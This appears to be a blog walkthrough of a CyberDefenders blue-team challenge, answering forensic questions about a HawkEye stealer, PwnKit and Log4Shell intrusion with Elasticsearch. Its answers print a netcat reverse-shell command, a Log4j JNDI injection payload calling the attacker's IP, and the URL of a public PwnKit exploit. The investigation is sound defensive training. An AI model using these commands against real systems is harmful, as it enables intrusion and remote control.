
Intro

CyberDefenders.org hosted a challenging HawkEye stealer challenge. You, the challenger/IR team, have to investigate an incident using Elasticsearch and answer questions about the infected victim and the attack narrative.

For those that don’t know about CyberDefenders, they host a platform dedicated to training blue-team skills (incident response, digital forensics, security analysis, etc.). If you are used to VulnHub and Hack The Box, those services are typically geared more towards red teaming and penetration testing. This is where CyberDefenders stands out!

Walkthrough

1) Who downloads the malicious file which has a double extension?

  • search: file.name:..* and rule.name:Downloads

Answer:

ahmed

2) What is the hostname he was using?

Answer:

DESKTOP-Q1SL9P2

3) What is the name of the malicious file?

Answer:

Acount_details.pdf.exe

4) What is the attacker’s IP address?

Hint:

  • time: feb 2 15:30+
  • search: related.user:ahmed
  • filter: destination.ip:exists

Answer:

192.168.1.10

5) Another user with high privilege runs the same malicious file. What is the username?

  • remove related.user from previous search

Answer:

cybery

6) The attacker was able to upload a DLL file of size 8704. What is the file name?

  • search: related.user:cybery and event.type:"creation"

Answer:

mCblHDgWP.dll

7) What parent process name spawns cmd with NT AUTHORITY privilege and pid 10716?

  • search: process.pid :10716
  • log: winlogbeat

Answer:

rundll32.exe

8) The previous process was able to access a registry key. What is the full path of the registry key?

Hint:

  • log: logs-*
  • search: process.name:"rundll32.exe"
  • time: feb 2 15:00+

Answer:

HKLM\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled

9) PowerShell process with pid 8836 changed a file in the system. What was that filename?

  • search: event.type:"change" and process.name:powershell.exe
  • log: logs-*

Answer:

ModuleAnalysisCache

10) PowerShell process with pid 11676 created files with the ps1 extension. What is the first file that has been created?

  • search: event.type:"creation" and process.name:powershell.exe and process.pid:11676
  • log: logs-*

Answer:

__PSScriptPolicyTest_bymwxuft.3b5.ps1

11) What is the IP address of the machine that is in the same LAN as the Windows machine?

This one threw up sharding issues for me???

Eventually, looking around the time of the attack and the address range 192.168.10.1/24, we found our answer…

Answer:

192.168.10.30

12) The attacker logged in to the Ubuntu machine after a brute-force attack. What is the username he successfully logged in with?

  • search: event.action:"ssh_login"
  • log: logs-*
  • time: feb 2 15:30+

Answer:

salem

13) After that, the attacker downloaded the exploit from a GitHub repo using wget. What is the full URL of the repo?

  • search: user.name:"salem" and wget
  • log: logs-*

Answer:

https://raw.githubusercontent.com/joeammond/CVE-2021-4034/main/CVE-2021-4034.py

14) After the attacker runs the exploit, which spawns a new process called pkexec, what is the process’s MD5 hash?

Tricky one, but if we search on the PIDs 3003/3004 from the previous answer…

  • search: process.name:"pkexec" and process.pid:3003
  • log: logs-*

Answer:

3a4ad518e9e404a6bad3d39dfebaf2f6

15) Then the attacker gets an interactive shell by running a specific command under process id 3011 as the root user. What is the command?

Answer:

bash -i

16) What is the hostname on which the alert signal.rule.name: "Netcat Network Activity" fired?

Hint:

  • switch to Security -> Rules

Answer:

CentOS

17) What is the username who ran netcat?

Answer:

solr

18) What is the parent process name of netcat?

Answer:

java

19) If you focus on the nc process, you can get the entire command that the attacker ran to get a reverse shell. What is the full command?

Answer:

nc -e /bin/bash 192.168.1.10 9999

20) From the previous three questions, you may remember a famous java vulnerability. What is it?

Answer:

log4shell

21) What is the entire log file path of the "solr" application?

Hint:

  • log: logs-*
  • search: file.name:solr*

Answer:

/var/solr/logs/solr.log

22) What is the path that is vulnerable to log4j?

Hint:

  • log: filebeat
  • search: log.file.path:"/var/solr/logs/solr.log"

Answer:

/admin/cores

23) What is the GET request parameter used to deliver log4j payload?

Answer:

foo

24) What is the JNDI payload that is connected to the LDAP port?

Answer:

{foo=${jndi:ldap://192.168.1.10:1389/Exploit}}
